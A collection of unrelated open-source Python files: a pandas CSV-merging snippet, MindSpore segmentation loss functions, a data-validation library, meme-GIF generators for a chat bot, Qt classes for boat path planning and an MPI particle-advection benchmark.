# width = parse_width(fn)
quant = read_csv(fn)
col_order = quant.columns.names
quant_min=quant.min(axis=0).to_frame(name=vid).transpose()
quant_min.index.name = "var"
fn_ref = os.path.join(os.path.dirname(fn), "stats_ref.csv")
if os.path.isfile(fn_ref):
quant_ref = pd.read_csv(fn_ref, index_col=[0,1]).transpose().sort_index(axis=1)
# levels_ref = list([[width]] +quant_ref.columns.levels)
# quant_ref.columns = pd.MultiIndex.from_product(levels_ref,
# names= ['width'] + quant_ref.columns.names,
# )
quant_ref.index = [vid]
else:
quant_ref = quant.loc[1, Idx[:, :, 0]].dropna().to_frame().transpose().droplevel("layer", axis=1)
quant_ref.index = [vid]
df_merge = pd.concat([df_merge, quant_min], ignore_index=False, axis=0)
df_ref_merge = pd.concat([df_ref_merge, quant_ref], ignore_index=False, axis=0)
df_merge.sort_index(axis=1, inplace=True)
df_ref_merge.sort_index(axis=1, inplace=True)
df_merge.to_csv(os.path.join(path_output, 'min.csv'))
df_ref_merge.to_csv(os.path.join(path_output, 'ref.csv'))
|
<gh_stars>10-100
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Loss functions."""
import mindspore.nn as nn
import mindspore.ops.operations as P
import mindspore.ops as F
from mindspore.common.tensor import Tensor
from mindspore import dtype as mstype
from mindspore.nn.loss.loss import LossBase
from src.config import config_hrnetv2_w48 as config
weights_list = [0.8373, 0.918, 0.866, 1.0345,
1.0166, 0.9969, 0.9754, 1.0489,
0.8786, 1.0023, 0.9539, 0.9843,
1.1116, 0.9037, 1.0865, 1.0955,
1.0865, 1.1529, 1.0507]
class CrossEntropyWithLogits(LossBase):
"""
Cross-entropy loss function for semantic segmentation,
and different classes have the same weight.
"""
def __init__(self, num_classes=19, ignore_label=255, image_size=None):
super(CrossEntropyWithLogits, self).__init__()
self.resize = F.ResizeBilinear(image_size)
self.one_hot = P.OneHot(axis=-1)
self.on_value = Tensor(1.0, mstype.float32)
self.off_value = Tensor(0.0, mstype.float32)
self.cast = P.Cast()
self.ce = nn.SoftmaxCrossEntropyWithLogits()
self.not_equal = P.NotEqual()
self.num_classes = num_classes
self.ignore_label = ignore_label
self.mul = P.Mul()
self.argmax = P.Argmax(output_type=mstype.int32)
self.sum = P.ReduceSum(False)
self.div = P.RealDiv()
self.transpose = P.Transpose()
self.reshape = P.Reshape()
def construct(self, logits, labels):
"""Loss construction."""
logits = self.resize(logits)
labels_int = self.cast(labels, mstype.int32)
labels_int = self.reshape(labels_int, (-1,))
logits_ = self.transpose(logits, (0, 2, 3, 1))
logits_ = self.reshape(logits_, (-1, self.num_classes))
weights = self.not_equal(labels_int, self.ignore_label)
weights = self.cast(weights, mstype.float32)
one_hot_labels = self.one_hot(labels_int, self.num_classes, self.on_value, self.off_value)
loss = self.ce(logits_, one_hot_labels)
loss = self.mul(weights, loss)
loss = self.div(self.sum(loss), self.sum(weights))
return loss
class CrossEntropyWithLogitsAndWeights(LossBase):
"""
Cross-entropy loss function for semantic segmentation,
and different classes have different weights.
"""
def __init__(self, num_classes=19, ignore_label=255, image_size=None):
super(CrossEntropyWithLogitsAndWeights, self).__init__()
self.one_hot = P.OneHot(axis=-1)
self.on_value = Tensor(1.0, mstype.float32)
self.off_value = Tensor(0.0, mstype.float32)
self.cast = P.Cast()
self.ce = nn.SoftmaxCrossEntropyWithLogits()
self.zeros = F.Zeros()
self.fill = F.Fill()
self.equal = F.Equal()
self.select = F.Select()
self.num_classes = num_classes
self.ignore_label = ignore_label
self.mul = P.Mul()
self.argmax = P.Argmax(output_type=mstype.int32)
self.sum = P.ReduceSum(False)
self.div = P.RealDiv()
self.transpose = P.Transpose()
self.reshape = P.Reshape()
def construct(self, logits, labels):
"""Loss construction."""
labels_int = self.cast(labels, mstype.int32)
labels_int = self.reshape(labels_int, (-1,))
logits_ = self.transpose(logits, (0, 2, 3, 1))
logits_ = self.reshape(logits_, (-1, self.num_classes))
labels_float = self.cast(labels_int, mstype.float32)
weights = self.zeros(labels_float.shape, mstype.float32)
for i in range(self.num_classes):
fill_weight = self.fill(mstype.float32, labels_float.shape, weights_list[i])
equal_ = self.equal(labels_float, i)
weights = self.select(equal_, fill_weight, weights)
one_hot_labels = self.one_hot(labels_int, self.num_classes, self.on_value, self.off_value)
loss = self.ce(logits_, one_hot_labels)
loss = self.mul(weights, loss)
loss = self.div(self.sum(loss), self.sum(weights))
return loss
class CrossEntropy(nn.Cell):
"""Loss for OCRNet Specifically"""
def __init__(self, num_classes=19, ignore_label=-1):
super(CrossEntropy, self).__init__()
self.ignore_label = ignore_label
self.criterion = CrossEntropyWithLogitsAndWeights(num_classes=num_classes, ignore_label=ignore_label)
self.sum = P.ReduceSum()
self.weights = config.loss.balance_weights
self.num_outputs = config.model.num_outputs
self.align_corners = config.model.align_corners
self.resize_bilinear = nn.ResizeBilinear()
self.concat = P.Concat()
def _forward(self, score, target):
ph, pw = score.shape[2], score.shape[3]
h, w = target.shape[1], target.shape[2]
if ph != h or pw != w:
score = self.resize_bilinear(score, size=(h, w), align_corners=self.align_corners)
loss = self.criterion(score, target)
return loss
def construct(self, score, target):
if self.num_outputs == 1:
score = [score]
res = []
for w, x in zip(self.weights, score):
res.append(w * self._forward(x, target))
result = 0
for ele in res:
result += ele
return result
|
<gh_stars>1-10
"""
dictator
~~~~~~~~
Structured data validation library.
:copyright: (c) 2015 by <NAME>.
:license: BSD, see LICENSE.txt for more details.
"""
import string
import datetime
import collections
from functools import wraps
from itertools import imap, izip, chain
__all__ = ('Boolean', 'String', 'Integer', 'Date', 'Datetime',
'Sequence', 'SimpleMapping', 'DeclaredMapping', 'Mapping',
'one_of', 'get_errors')
class ImmutableDict(dict):
_hash = None
def __hash__(self):
if self._hash is None:
self._hash = hash(frozenset(self.items()))
return self._hash
def _immutable(self):
raise TypeError("{} object is immutable"
.format(self.__class__.__name__))
__delitem__ = __setitem__ = _immutable
clear = pop = popitem = setdefault = update = _immutable
def N_(string):
"""Marks strings for further translation."""
return string
def _generative(func):
"""Decorator, which wraps method to call it in the context
of the copied class to provide methods chaining and immutability
for the original class."""
@wraps(func)
def wrapper(cls, *args, **kwargs):
if not hasattr(cls, '__subclassed__'):
# subclass
cls = type(cls.__name__, (cls,), {'__subclassed__': True})
else:
# copy
cls = type(cls.__name__, cls.__bases__, dict(cls.__dict__))
func(cls, *args, **kwargs)
return cls
return wrapper
def _accepts(*types):
"""Verifies incoming value type."""
def decorator(func):
@wraps(func)
def wrapper(self, data):
if not isinstance(data, types):
self.note_error(N_(u'Invalid type'))
else:
return func(self, data)
return wrapper
return decorator
def _empty_check(func):
"""Checks for empty values."""
@wraps(func)
def wrapper(self, data):
if not data.strip():
if self.optional:
pass
else:
self.note_error(N_(u'Empty value'))
else:
return func(self, data)
return wrapper
def _handle_empty(func):
"""Handles `None` values, they are serialized as empty values."""
@wraps(func)
def wrapper(self):
return func(self) if self.state is not None else u''
return wrapper
_undefined = object()
class Base(object):
__expect__ = ()
#: name of the element, if it is a part of the mapping.
name = None
#: internal value representation.
state = None
#: `True` if deserialization and validation was successful,
#: `False` if there was any kind of error, `None` if element
#: was instantiated in other way. See also `with_value` and
#: `without_value` methods.
valid = None
#: list of deserialization and validation errors.
errors = ()
def __deserialize__(self, data):
"""To deserialize string values into pythonic types."""
raise NotImplementedError
def __serialize__(self):
"""To serialize pythonic types into string values."""
raise NotImplementedError
def __import__(self, value):
"""To initialize `dictator` schema instance from pythonic
data structure."""
raise NotImplementedError
def __export__(self):
"""To export `dictator` schema instance as pythonic data
structure."""
raise NotImplementedError
def __validate__(self):
value = self.__export__()
if value is not None:
self.valid = True # this can be changed later by validators
for validator in self.__expect__:
validator(self)
def __new__(cls, data):
self = object.__new__(cls)
self.__deserialize__(data)
return self
def __init__(self, data):
self.__validate__()
@property
def value(self):
"""Returns deserialized and validated pythonic data structure,
represented by this schema type."""
return self.__export__()
@property
def data(self):
"""Returns data structure, with scalar values serialized to
strings."""
return self.__serialize__()
@classmethod
def with_value(cls, value):
"""Initializes schema type with pythonic value, without
running deserialization and validation."""
self = object.__new__(cls)
self.__import__(value)
return self
@classmethod
def without_value(cls, errors=None):
"""Initializes schema type without value, as empty.
Optionally list of errors can be provided, this will also
mark this schema instance as non valid."""
self = object.__new__(cls)
map(self.note_error, errors or ())
return self
def note_error(self, error):
"""Adds error for this element."""
self.errors += (error,)
self.valid = False
@classmethod
@_generative
def named(cls, name):
"""Returns named schema type."""
cls.name = name
@classmethod
@_generative
def using(cls, **options):
"""Returns schema type with modified options, provided
using keyword arguments."""
for name, value in options.iteritems():
setattr(cls, name, value)
@classmethod
@_generative
def expect(cls, *validators):
"""Returns schema type with specified value validating
functions."""
cls.__expect__ = validators
class Scalar(Base):
__apply__ = ()
#: option, when `True`, this type will be able to receive
#: empty value.
optional = False
@classmethod
@_generative
def apply(cls, *functions):
"""Returns schema type with specified in arguments value
modification functions. They are called after deserialization
and before validation."""
cls.__apply__ = functions
def __init__(self, data):
value = self.__export__()
if value is not None:
for function in self.__apply__:
value = function(value)
self.__import__(value)
super(Scalar, self).__init__(data)
def __export__(self):
return self.state
def __import__(self, value):
self.state = value
class Boolean(Scalar):
"""Deserializes boolean type.
`True` values: "1", "true", "True", "t" or "on".
`False` values: "0", "false", "False", "f" or "off".
"""
@_accepts(unicode)
@_empty_check
def __deserialize__(self, data):
if data in (u'1', u'true', u'True', u't', u'on'):
self.state = True
elif data in (u'0', u'false', u'False', u'f', u'off'):
self.state = False
else:
self.note_error(N_(u'Invalid value'))
@_handle_empty
def __serialize__(self):
return u'true' if self.state else u'false'
class String(Scalar):
"""Deserializes string type.
NOTE: it contains one default value modifier: `strip` function.
"""
__apply__ = (string.strip,)
@_accepts(unicode)
@_empty_check
def __deserialize__(self, data):
self.state = data
@_handle_empty
def __serialize__(self):
return unicode(self.state)
class Integer(Scalar):
"""Deserializes integer type."""
@_accepts(unicode)
@_empty_check
def __deserialize__(self, data):
try:
self.state = int(data)
except ValueError:
self.note_error(N_(u'Invalid value'))
@_handle_empty
def __serialize__(self):
return unicode(self.state)
class Date(Scalar):
"""Deserializes dates into `datetime.date` type."""
#: option, provides format for date parsing and formatting.
date_format = '%Y-%m-%d'
@_accepts(unicode)
@_empty_check
def __deserialize__(self, data):
try:
dt = datetime.datetime.strptime(data, self.date_format)
self.state = dt.date()
except ValueError:
self.note_error(N_(u'Invalid value'))
@_handle_empty
def __serialize__(self):
return unicode(self.state.strftime(self.date_format))
class Datetime(Scalar):
"""Deserializes date/time into `datetime.datetime` type."""
#: option, provides format for date/time parsing and formatting.
datetime_format = '%Y-%m-%dT%H:%M:%S'
@_accepts(unicode)
@_empty_check
def __deserialize__(self, data):
try:
self.state = datetime.datetime.strptime(data, self.datetime_format)
except ValueError:
self.note_error(N_(u'Invalid value'))
@_handle_empty
def __serialize__(self):
return unicode(self.state.strftime(self.datetime_format))
class Container(Base):
@classmethod
@_generative
def of(cls, *args, **kwargs):
raise NotImplementedError
def __getitem__(self, key):
raise NotImplementedError
class Sequence(Container):
"""Represents sequence of items.
By default it represents a sequence of strings.
"""
__value_type__ = String
state = ()
@classmethod
@_generative
def of(cls, value_type):
"""Returns `Sequence` schema type with specified item type."""
cls.__value_type__ = value_type
def __validate__(self):
super(Sequence, self).__validate__()
items_iterator = chain(self.state, [self])
self.valid = all(item.valid for item in items_iterator)
def __export__(self):
return [item.__export__() for item in self.state]
def __import__(self, value):
self.state = tuple(imap(self.__value_type__.with_value, value))
@_accepts(collections.Sequence)
def __deserialize__(self, data):
self.state = tuple(imap(self.__value_type__, data))
def __serialize__(self):
return [item.__serialize__() for item in self.state]
def __getitem__(self, index):
return self.state[index]
class SimpleMapping(Container):
"""Represents mapping of strings to values.
By default it represents a mapping of strings to strings.
"""
__value_type__ = String
state = ImmutableDict()
@classmethod
@_generative
def of(cls, value_type):
"""Returns `SimpleMapping` schema type with specified value type."""
cls.__value_type__ = value_type
def __validate__(self):
super(SimpleMapping, self).__validate__()
items_iterator = chain(self.state.itervalues(), [self])
self.valid = all(item.valid for item in items_iterator)
def __export__(self):
return {k: v.__export__() for k, v in self.state.iteritems()}
def __import__(self, value):
keys, values = zip(*value.iteritems()) or ([], [])
values_iterator = imap(self.__value_type__.with_value, values)
self.state = ImmutableDict(izip(keys, values_iterator))
@_accepts(collections.Mapping)
def __deserialize__(self, data):
keys, values_data = zip(*data.iteritems()) or ([], [])
values_iterator = imap(self.__value_type__, values_data)
self.state = ImmutableDict(izip(keys, values_iterator))
def __serialize__(self):
return {k: v.__serialize__() for k, v in self.state.iteritems()}
def __getitem__(self, key):
return self.state[key]
class DeclaredMapping(Container):
"""Represents mapping with predefined keys and value types."""
__value_types__ = ()
state = ImmutableDict()
#: option, when `False`, which is by default, any missing key
#: will flag an error.
missing = False
#: option, when `False`, which is by default, any unknown key
#: will flag an error.
unknown = False
@classmethod
@_generative
def of(cls, *value_types):
"""Returns `DeclaredMapping` with specified named value types."""
cls.__value_types__ = tuple(value_types)
def __validate__(self):
super(DeclaredMapping, self).__validate__()
items_iterator = chain(self.state.itervalues(), [self])
self.valid = all(item.valid is not False for item in items_iterator)
def __import__(self, value):
state = {}
for value_type in self.__value_types__:
item_value = value.get(value_type.name, None)
if item_value is None:
state[value_type.name] = value_type.without_value()
else:
state[value_type.name] = value_type.with_value(item_value)
self.state = ImmutableDict(state)
def __export__(self):
return {k: v.__export__() for k, v in self.state.iteritems()}
@_accepts(collections.Mapping)
def __deserialize__(self, data):
defined_keys = set(t.name for t in self.__value_types__)
provided_keys = set(data.iterkeys())
missing_keys = defined_keys - provided_keys
if missing_keys and not self.missing:
self.note_error(N_(u'Missing keys'))
unknown_keys = provided_keys - defined_keys
if unknown_keys and not self.unknown:
self.note_error(N_(u'Unknown keys'))
state = {}
for value_type in self.__value_types__:
value_data = data.get(value_type.name, _undefined)
if value_data is _undefined:
errors = () if self.missing else (N_(u'Missing value'),)
state[value_type.name] = value_type.without_value(errors)
else:
state[value_type.name] = value_type(value_data)
self.state = ImmutableDict(state)
def __serialize__(self):
return {k: v.__serialize__() for k, v in self.state.iteritems()}
def __getitem__(self, key):
return self.state[key]
class Mapping(Container):
"""Works like a factory for `SimpleMapping` and `DeclaredMapping`."""
@classmethod
def of(cls, *value_types):
"""Returns `SimpleMapping` or `DeclaredMapping` depending on
provided value types.
If there is only one type provided and it does not have a name,
then `SimpleMapping` will be returned, otherwise
`DeclaredMapping` will be returned.
"""
if len(value_types) == 1 and not value_types[0].name:
return SimpleMapping.of(value_types[0])
else:
return DeclaredMapping.of(*value_types)
def one_of(values):
"""Checks that element's value is one of the provided values."""
values = set(values)
def one_of_checker(el):
if el.value not in values:
el.note_error(N_(u'Wrong choice'))
return one_of_checker
def get_errors(schema):
"""Walks through the schema instance to collect all errors."""
if isinstance(schema, Container):
if isinstance(schema.state, tuple):
return {'errors': schema.errors,
'items': map(get_errors, schema.state)}
elif isinstance(schema.state, dict):
keys, values = zip(*schema.state.iteritems())
values = imap(get_errors, values)
return {'errors': schema.errors,
'items': dict(izip(keys, values))}
else:
raise TypeError('Unknown collection type: %r' % type(schema))
else:
return {'errors': schema.errors}
|
<reponame>umimori13/mai-bot
import random
import imageio
from io import BytesIO
from typing import List, Tuple
from PIL.Image import Image as IMG
from PIL import Image, ImageDraw, ImageFilter
from .download import get_resource
def resize(img: IMG, size: Tuple[int, int]) -> IMG:
return img.resize(size, Image.ANTIALIAS)
def rotate(img: IMG, angle: int, expand: bool = True) -> IMG:
return img.rotate(angle, Image.BICUBIC, expand=expand)
def circle(img: IMG) -> IMG:
mask = Image.new('L', img.size, 0)
draw = ImageDraw.Draw(mask)
draw.ellipse((0, 0, img.size[0], img.size[1]), fill=255)
mask = mask.filter(ImageFilter.GaussianBlur(0))
img.putalpha(mask)
return img
def square(img: IMG) -> IMG:
width, height = img.size
length = min(width, height)
return img.crop(((width - length) / 2, (height - length) / 2,
(width + length) / 2, (height + length) / 2))
def save_gif(frames: List[IMG], duration: float) -> BytesIO:
output = BytesIO()
imageio.mimsave(output, frames, format='gif', duration=duration)
return output
def to_jpg(frame: IMG, bg_color=(255, 255, 255)) -> IMG:
if frame.mode == 'RGBA':
bg = Image.new('RGB', frame.size, bg_color)
bg.paste(frame, mask=frame.split()[3])
return bg
else:
return frame.convert('RGB')
def save_jpg(frame: IMG) -> BytesIO:
output = BytesIO()
frame = frame.convert('RGB')
frame.save(output, format='jpeg')
return output
def load_image(data: bytes, convert: bool = True) -> IMG:
image = Image.open(BytesIO(data))
if convert:
image = square(to_jpg(image).convert('RGBA'))
return image
async def load_resource(path: str, name: str) -> IMG:
image = await get_resource(path, name)
return Image.open(BytesIO(image)).convert('RGBA')
async def petpet(img: IMG, *args) -> BytesIO:
frames = []
locs = [(14, 20, 98, 98), (12, 33, 101, 85), (8, 40, 110, 76),
(10, 33, 102, 84), (12, 20, 98, 98)]
for i in range(5):
frame = Image.new('RGBA', (112, 112), (255, 255, 255, 0))
x, y, w, h = locs[i]
frame.paste(img.resize((w, h), Image.ANTIALIAS), (x, y))
hand = await load_resource('petpet', f'{i}.png')
frame.paste(hand, mask=hand)
frames.append(frame)
return save_gif(frames, 0.06)
async def kiss(self_img: IMG, user_img: IMG, *args) -> BytesIO:
user_locs = [(58, 90), (62, 95), (42, 100), (50, 100), (56, 100), (18, 120), (28, 110),
(54, 100), (46, 100), (60, 100), (35, 115), (20, 120), (40, 96)]
self_locs = [(92, 64), (135, 40), (84, 105), (80, 110), (155, 82), (60, 96), (50, 80),
(98, 55), (35, 65), (38, 100), (70, 80), (84, 65), (75, 65)]
frames = []
for i in range(13):
frame = await load_resource('kiss', f'{i}.png')
user_head = resize(circle(user_img), (50, 50))
frame.paste(user_head, user_locs[i], mask=user_head)
self_head = resize(circle(self_img), (40, 40))
frame.paste(self_head, self_locs[i], mask=self_head)
frames.append(frame)
return save_gif(frames, 0.05)
async def rub(self_img: IMG, user_img: IMG, *args) -> BytesIO:
user_locs = [(39, 91, 75, 75), (49, 101, 75, 75), (67, 98, 75, 75),
(55, 86, 75, 75), (61, 109, 75, 75), (65, 101, 75, 75)]
self_locs = [(102, 95, 70, 80, 0), (108, 60, 50, 100, 0), (97, 18, 65, 95, 0),
(65, 5, 75, 75, -20), (95, 57, 100, 55, -70), (109, 107, 65, 75, 0)]
frames = []
for i in range(6):
frame = await load_resource('rub', f'{i}.png')
x, y, w, h = user_locs[i]
user_head = resize(circle(user_img), (w, h))
frame.paste(user_head, (x, y), mask=user_head)
x, y, w, h, angle = self_locs[i]
self_head = rotate(resize(circle(self_img), (w, h)), angle)
frame.paste(self_head, (x, y), mask=self_head)
frames.append(frame)
return save_gif(frames, 0.05)
async def play(img: IMG, *args) -> BytesIO:
locs = [(180, 60, 100, 100), (184, 75, 100, 100), (183, 98, 100, 100),
(179, 118, 110, 100), (156, 194, 150, 48), (178, 136, 122, 69),
(175, 66, 122, 85), (170, 42, 130, 96), (175, 34, 118, 95),
(179, 35, 110, 93), (180, 54, 102, 93), (183, 58, 97, 92),
(174, 35, 120, 94), (179, 35, 109, 93), (181, 54, 101, 92),
(182, 59, 98, 92), (183, 71, 90, 96), (180, 131, 92, 101)]
raw_frames = []
for i in range(23):
raw_frame = await load_resource('play', f'{i}.png')
raw_frames.append(raw_frame)
img_frames = []
for i in range(len(locs)):
frame = Image.new('RGBA', (480, 400), (255, 255, 255, 0))
x, y, w, h = locs[i]
frame.paste(resize(img, (w, h)), (x, y))
raw_frame = raw_frames[i]
frame.paste(raw_frame, mask=raw_frame)
img_frames.append(frame)
frames = []
for i in range(2):
frames.extend(img_frames[0:12])
frames.extend(img_frames[0:8])
frames.extend(img_frames[12:18])
frames.extend(raw_frames[18:23])
return save_gif(frames, 0.06)
async def pat(img: IMG, *args) -> BytesIO:
locs = [(11, 73, 106, 100), (8, 79, 112, 96)]
img_frames = []
for i in range(10):
frame = Image.new('RGBA', (235, 196), (255, 255, 255, 0))
x, y, w, h = locs[1] if i == 2 else locs[0]
frame.paste(resize(img, (w, h)), (x, y))
raw_frame = await load_resource('pat', f'{i}.png')
frame.paste(raw_frame, mask=raw_frame)
img_frames.append(frame)
seq = [0, 1, 2, 3, 1, 2, 3, 0, 1, 2, 3, 0, 0, 1, 2, 3,
0, 0, 0, 0, 4, 5, 5, 5, 6, 7, 8, 9]
frames = [img_frames[n] for n in seq]
return save_gif(frames, 0.085)
async def rip(img: IMG, *args) -> BytesIO:
rip = await load_resource('rip', '0.png')
frame = Image.new('RGBA', rip.size, (255, 255, 255, 0))
left = rotate(resize(img, (385, 385)), 24)
right = rotate(resize(img, (385, 385)), -11)
frame.paste(left, (-5, 355))
frame.paste(right, (649, 310))
frame.paste(rip, mask=rip)
return save_jpg(frame)
async def throw(img: IMG, *args) -> BytesIO:
img = resize(rotate(circle(img), random.randint(1, 360),
expand=False), (143, 143))
frame = await load_resource('throw', '0.png')
frame.paste(img, (15, 178), mask=img)
return save_jpg(frame)
async def crawl(img: IMG, *args) -> BytesIO:
img = resize(circle(img), (100, 100))
frame = await load_resource('crawl', '{:02d}.jpg'.format(random.randint(1, 92)))
frame.paste(img, (0, 400), mask=img)
return save_jpg(frame)
async def support(img: IMG, *args) -> BytesIO:
support = await load_resource('support', '0.png')
frame = Image.new('RGBA', support.size, (255, 255, 255, 0))
img = rotate(resize(img, (815, 815)), 23)
frame.paste(img, (-172, -17))
frame.paste(support, mask=support)
return save_jpg(frame)
async def always(img: IMG, *args) -> BytesIO:
always = await load_resource('always', '0.png')
w, h = img.size
h1 = int(h / w * 249)
h2 = int(h / w * 47)
height = h1 + h2 + 5
def paste(img: IMG) -> IMG:
img = to_jpg(img)
frame = Image.new('RGBA', (249, height), (255, 255, 255, 0))
frame.paste(always, (0, h1 - 249 + int((h2 - 47) / 2)))
frame.paste(resize(img, (249, h1)), (0, 0))
frame.paste(resize(img, (47, h2)), (140, h1 + 2))
return frame
if not getattr(img, 'is_animated', False):
return save_jpg(paste(img))
else:
frames = []
for i in range(img.n_frames):
img.seek(i)
frames.append(paste(img))
return save_gif(frames, img.info['duration'] / 1000)
|
<filename>src/qt_classes.py
"""Defines classes to be used with Qt."""
import config
from path_finding.mission_planner import MissionPlanner
from PySide2.QtCore import Property
from PySide2.QtCore import QAbstractListModel
from PySide2.QtCore import QModelIndex
from PySide2.QtCore import QObject
from PySide2.QtCore import Signal
from PySide2.QtCore import Slot
from PySide2.QtPositioning import QGeoCoordinate
from PySide2.QtPositioning import QGeoPolygon
from shapely.geometry.point import Point
class PolygonGenerator(QObject):
"""A generator which can be used to send polygons to QML."""
def __init__(self, data_source_method):
"""
Create the generator and construct the QObject.
Args:
- data_source_method: Function to call for retrieving
raw polygon data (must return QGeoPolygon)
"""
QObject.__init__(self)
self.get_polygon_data = data_source_method
polygonChanged = Signal(QGeoPolygon)
@Slot(QGeoPolygon)
def __add_polygon(self, poly: QGeoPolygon):
"""Add a polygon to the QML view.
Args:
- poly: Which polygon we ought to add.
"""
self.__poly = poly
self.polygonChanged.emit(self.__poly)
@Slot(result=QGeoPolygon)
def get_polygon(self):
"""Gets the currently selected polygon."""
return self.__poly
@Slot()
def fetchPolygon(self):
"""QML accessible function which displays the polygons on the map."""
polygons = self.get_polygon_data()
[self.polygonChanged.emit(pol) for pol in polygons]
poly = Property(QGeoPolygon, get_polygon, notify=polygonChanged)
class DebugPolygonGenerator(PolygonGenerator):
"""
A generator which can be used to send polygons to QML.
Allows for relaying position data from inside of QML.
"""
@Slot(float, float)
def fetchPolygon(self, latitude: float, longitude: float):
"""
QML accessible function which displays the polygons on the map.
Args:
- latitude: Latitude of the point to construct the
fence polygon around
- longitude: Longitude of the point to construct the
fence polygon around
"""
polygons = self.get_polygon_data(latitude, longitude)
[self.polygonChanged.emit(pol) for pol in polygons]
class MissionPathModel(QAbstractListModel):
"""A model which stores the points on the current mission."""
missionChanged = Signal()
def __init__(self, parent=None):
"""Create the model object and initiaze the QT object."""
super().__init__(parent)
self._location = QGeoCoordinate(52.40359289862932, 4.662117677145794)
self._target = QGeoCoordinate(52.40757766975709, 4.663778575775887)
self._mission_paths = [self._location, self._target]
def rowCount(self, parent=QModelIndex()):
"""Fetches the number of points on the path."""
return len(self._mission_paths)
def roleNames(self):
"""Returns the roles that the data can take."""
return {MissionPathModel.Both: b"both"}
def add(self, point: QGeoCoordinate) -> None:
"""Adds a coordinate to the path."""
self._mission_paths.append(point)
@Slot(int, result=QGeoCoordinate)
def get(self, index: int):
"""QML accessible function to get data from the array.
Args:
index: Location of the data on the array,
Returns:
A QT representation of the next coordinate.
"""
try:
return self._mission_paths[index]
except IndexError:
return None
@Slot()
def clear(self):
"""QML accessible function to delete all the points of the mission."""
self._mission_paths = []
@Slot()
def addSignal(self):
"""QML accessible function which adds some points to the list."""
self.add(QGeoCoordinate(52.403747, 4.660064))
self.add(QGeoCoordinate(52.408165, 4.667674))
self.missionChanged.emit()
@Slot(float, float, float, float)
def createPath(self, boat_lat: float, boat_long: float, dest_lat: float,
dest_long: float):
"""QML accessible function which creates a new path.
Generates points for path to given destination.
Args:
- boat_lat: Current latitude of boat
- boat_long: Current longitude of boat
- dest_lat: Latitude of desired destination
- dest_long: Longitude of desired destination
"""
mis = MissionPlanner()
# Create boat object and trip
boat_id = 23
boat_origin = Point(boat_long, boat_lat)
boat_destination = Point(dest_long, dest_lat)
boat = mis.add_new_mission(boat_id, boat_origin, boat_destination)
boat = mis.generate_waypoints(boat, 50, 18, 20)
self.clear()
while len(boat._path) > 0:
waypoint = boat._path.popleft()
self.add(QGeoCoordinate(waypoint.y, waypoint.x))
self.missionChanged.emit()
class ConfigFile(QObject):
"""Singleton class for config file."""
def __init__(self, parent=None):
"""Create wrapper class around the Python config parser."""
super().__init__(parent)
self._config = config.ConfigFile()
@Slot(str, str, result=str)
def general_getter(self, topic: str, spec: str):
"""A general getter for a given topic and specification.
Args:
- topic: Configuration file topic to search in
- spec: Name of item to fetch
- data_type: Specifies how to process parsed value
"""
return self._config.general_getter(topic, spec)
@Slot(str, str, str)
def write_to_file(self, topic: str, spec: str, val):
"""Write the given value to a (possibly new) spec in the config file.
Args:
- topic: Configuration file topic to write within
- spec: Item name to bind value to
- val: Value to write to config file
"""
self._config.write_to_file(topic, spec, val)
def add_topic(self, topic: str) -> None:
"""Add a new topic to the config file.
Args:
- topic: Name of new topic to add
"""
self._config.add_topic(topic)
|
from parcels import (FieldSet, ParticleSet, JITParticle,
Variable, AdvectionRK4)
import numpy as np
import math
from datetime import timedelta as delta
import time as clock
import os
from argparse import ArgumentParser
from mpi4py import MPI
p = ArgumentParser(description="""
blablabla""")
p.add_argument('-p', '--particles', type=int, default=1,
help='Number of particles to advect')
args = p.parse_args()
npart = args.particles
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
def stommel_fieldset(xdim=200, ydim=200):
a = 10000 * 1e3
b = 10000 * 1e3
scalefac = 0.05 # to scale for physically meaningful velocities
# Coordinates of the test fieldset (on A-grid in deg)
lon = np.linspace(0, a, xdim, dtype=np.float32)
lat = np.linspace(0, b, ydim, dtype=np.float32)
# Define arrays U (zonal), V (meridional), W (vertical) and P (sea
# surface height) all on A-grid
U = np.zeros((lon.size, lat.size), dtype=np.float32)
V = np.zeros((lon.size, lat.size), dtype=np.float32)
P = np.zeros((lon.size, lat.size), dtype=np.float32)
beta = 2e-11
r = 1/(11.6*86400)
es = r/(beta*a)
for i in range(lon.size):
for j in range(lat.size):
xi = lon[i] / a
yi = lat[j] / b
P[i, j] = (1 - math.exp(-xi/es) - xi) * math.pi * np.sin(math.pi*yi)*scalefac
U[i, j] = -(1 - math.exp(-xi/es) - xi) * math.pi**2 * np.cos(math.pi*yi)*scalefac
V[i, j] = (math.exp(-xi/es)/es - 1) * math.pi * np.sin(math.pi*yi)*scalefac
data = {'U': U, 'V': V, 'P': P}
dimensions = {'lon': lon, 'lat': lat}
return FieldSet.from_data(data, dimensions, mesh='flat', transpose=True)
def UpdateP(particle, fieldset, time):
particle.p = fieldset.P[time, particle.depth, particle.lat, particle.lon]
def stommel_pset(fieldset, npart=1):
class MyParticle(JITParticle):
p = Variable('p', dtype=np.float32, initial=0.)
p_start = Variable('p_start', dtype=np.float32, initial=fieldset.P)
return ParticleSet.from_line(fieldset,
size=npart,
pclass=MyParticle,
start=(10e3, 5000e3),
finish=(1000e3, 5000e3),
time=0)
comm.Barrier()
if rank == 0:
tic = clock.time()
comm.Barrier()
fset = stommel_fieldset()
comm.Barrier()
if rank == 0:
tic_pset = clock.time()
comm.Barrier()
pset = stommel_pset(fset, npart=npart)
comm.Barrier()
if rank == 0:
tac_pset = clock.time()
comm.Barrier()
kernel = AdvectionRK4 + pset.Kernel(UpdateP)
comm.Barrier()
if rank == 0:
toc = clock.time()
comm.Barrier()
pset.execute(kernel,
runtime=delta(days=365*5),
dt=delta(hours=1))
comm.Barrier()
if rank == 0:
tac = clock.time()
ofile = 'stommel_npart_scaling.log'
f = open(ofile, 'a')
f.write('CPU time on %02d procs for %d particles is: %g (%g %g)\n' %
(size, npart, tac-tic, tac-toc, tac_pset-tic_pset))
f.close()
|
###############################################################################
##
## Copyright (C) 2013-2014 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
